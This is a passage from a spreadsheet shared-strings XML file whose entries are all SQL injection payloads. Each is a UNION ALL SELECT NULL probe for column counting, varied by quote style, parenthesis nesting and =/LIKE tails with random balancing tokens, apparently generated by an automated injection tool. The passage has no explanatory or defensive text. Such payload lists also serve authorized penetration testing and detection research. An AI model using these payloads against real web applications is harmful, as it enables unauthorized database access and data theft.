    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'DSLV' = 'DSLV</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'IZKJ' = 'IZKJ</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'RBcS' = 'RBcS</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND   (  (  'Vrci' = 'Vrci</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'Ixyy' = 'Ixyy</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'dJiR' = 'dJiR</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'iyIU' = 'iyIU</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'dtFG' = 'dtFG</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'WYan' = 'WYan</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL# AND   (  (   ( 'DfQT' = 'DfQT</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'lZQa' = 'lZQa</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'Dgvq' = 'Dgvq</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'oBeE' = 'oBeE</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'qcju' = 'qcju</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'Fbdy' = 'Fbdy</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'IOYc' = 'IOYc</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL# AND 'nhtI' = 'nhtI</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND 'TPFX' = 'TPFX</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND 'IDAk' = 'IDAk</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'Zlwi' = 'Zlwi</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'tIyO' = 'tIyO</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'NdsM' = 'NdsM</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'ZfMm' = 'ZfMm</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL# AND  ( 'oPlH' LIKE 'oPlH</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND  ( 'lBad' LIKE 'lBad</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'joqg' LIKE 'joqg</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'OhxA' LIKE 'OhxA</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'gkwG' LIKE 'gkwG</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'mQBm' LIKE 'mQBm</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'Jogg' LIKE 'Jogg</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND   (  (  'Qnjd' LIKE 'Qnjd</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'GedM' LIKE 'GedM</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'MoAv' LIKE 'MoAv</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'ggbQ' LIKE 'ggbQ</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'BntK' LIKE 'BntK</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'gCIH' LIKE 'gCIH</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL# AND   (  (   ( 'oKll' LIKE 'oKll</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'rvZu' LIKE 'rvZu</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'QRyq' LIKE 'QRyq</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'CznY' LIKE 'CznY</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'hHNs' LIKE 'hHNs</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'rWOf' LIKE 'rWOf</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'fpyt' LIKE 'fpyt</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL# AND 'nNuh' LIKE 'nNuh</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL# AND 'hBhR' LIKE 'hBhR</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND 'qqgc' LIKE 'qqgc</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND 'ZFBA' LIKE 'ZFBA</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'wuIW' LIKE 'wuIW</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'dOui' LIKE 'dOui</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'vZIE' LIKE 'vZIE</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'cMfZ' LIKE 'cMfZ</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL# AND  ( "nnEq" = "nnEq</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND  ( "lNMK" = "lNMK</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "eIEB" = "eIEB</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "lncA" = "lncA</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "Vxxr" = "Vxxr</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "qbzP" = "qbzP</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "BIPL" = "BIPL</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL# AND   (  (  "NKKQ" = "NKKQ</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND   (  (  "zrHf" = "zrHf</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "WrnT" = "WrnT</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "BNDi" = "BNDi</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "CyNJ" = "CyNJ</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "kdEN" = "kdEN</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "hnIw" = "hnIw</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL# AND   (  (   ( "tHYO" = "tHYO</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL# AND   (  (   ( "zfFp" = "zfFp</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "PuVS" = "PuVS</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "jRDH" = "jRDH</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "qOVA" = "qOVA</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "XBHx" = "XBHx</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "ARGZ" = "ARGZ</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "NgCk" = "NgCk</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL# AND "sfVd" = "sfVd</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND "daSx" = "daSx</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND "bQNO" = "bQNO</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "apWn" = "apWn</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "CAIF" = "CAIF</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "fgyo" = "fgyo</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "PUZz" = "PUZz</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL# AND  ( "roZD" LIKE "roZD</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL# AND  ( "uxng" LIKE "uxng</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND  ( "zbZK" LIKE "zbZK</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "AKrr" LIKE "AKrr</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "DqfG" LIKE "DqfG</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "uWEy" LIKE "uWEy</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "eFgj" LIKE "eFgj</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "Slgi" LIKE "Slgi</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL# AND   (  (  "qcUP" LIKE "qcUP</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL# AND   (  (  "qgsE" LIKE "qgsE</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND   (  (  "iWcM" LIKE "iWcM</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "BDhl" LIKE "BDhl</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "PIXK" LIKE "PIXK</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "aDXp" LIKE "aDXp</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "NJon" LIKE "NJon</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "OhTO" LIKE "OhTO</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL# AND   (  (   ( "UwKx" LIKE "UwKx</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL# AND   (  (   ( "RkAH" LIKE "RkAH</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "lPff" LIKE "lPff</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "kEcx" LIKE "kEcx</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "JhkK" LIKE "JhkK</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "QHOo" LIKE "QHOo</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "zsqn" LIKE "zsqn</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "uRFn" LIKE "uRFn</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL# AND "IYWu" LIKE "IYWu</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL# AND "pxeo" LIKE "pxeo</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL# AND "pJYO" LIKE "pJYO</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND "ngbA" LIKE "ngbA</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND "ByAj" LIKE "ByAj</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "TFpv" LIKE "TFpv</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "RJFU" LIKE "RJFU</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "SBwG" LIKE "SBwG</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "aSSN" LIKE "aSSN</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'vFEV' = 'vFEV</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'KhLb' = 'KhLb</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'oTeQ' = 'oTeQ</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'DZFj' = 'DZFj</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'ysRX' = 'ysRX</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'jYvI' = 'jYvI</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'ggtD' = 'ggtD</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'VYWZ' = 'VYWZ</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'EFzP' = 'EFzP</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'dUnK' = 'dUnK</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'OMGe' = 'OMGe</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'RfIK' = 'RfIK</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'PRaw' = 'PRaw</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'GTZl' = 'GTZl</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'wBPo' = 'wBPo</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'blUl' = 'blUl</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'AYRc' = 'AYRc</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'FBKK' = 'FBKK</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'MThi' = 'MThi</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'SCBu' = 'SCBu</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'FrsH' = 'FrsH</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'ebpi' = 'ebpi</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'xsvW' = 'xsvW</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'gUgf' = 'gUgf</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'GnYA' = 'GnYA</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'zjFm' = 'zjFm</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'wCUm' = 'wCUm</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'CPPV' = 'CPPV</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'hlKl' = 'hlKl</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'TYbH' = 'TYbH</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'lACu' = 'lACu</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'SaTh' = 'SaTh</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'owQz' LIKE 'owQz</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'bJNT' LIKE 'bJNT</t>
  </si>
  <si>
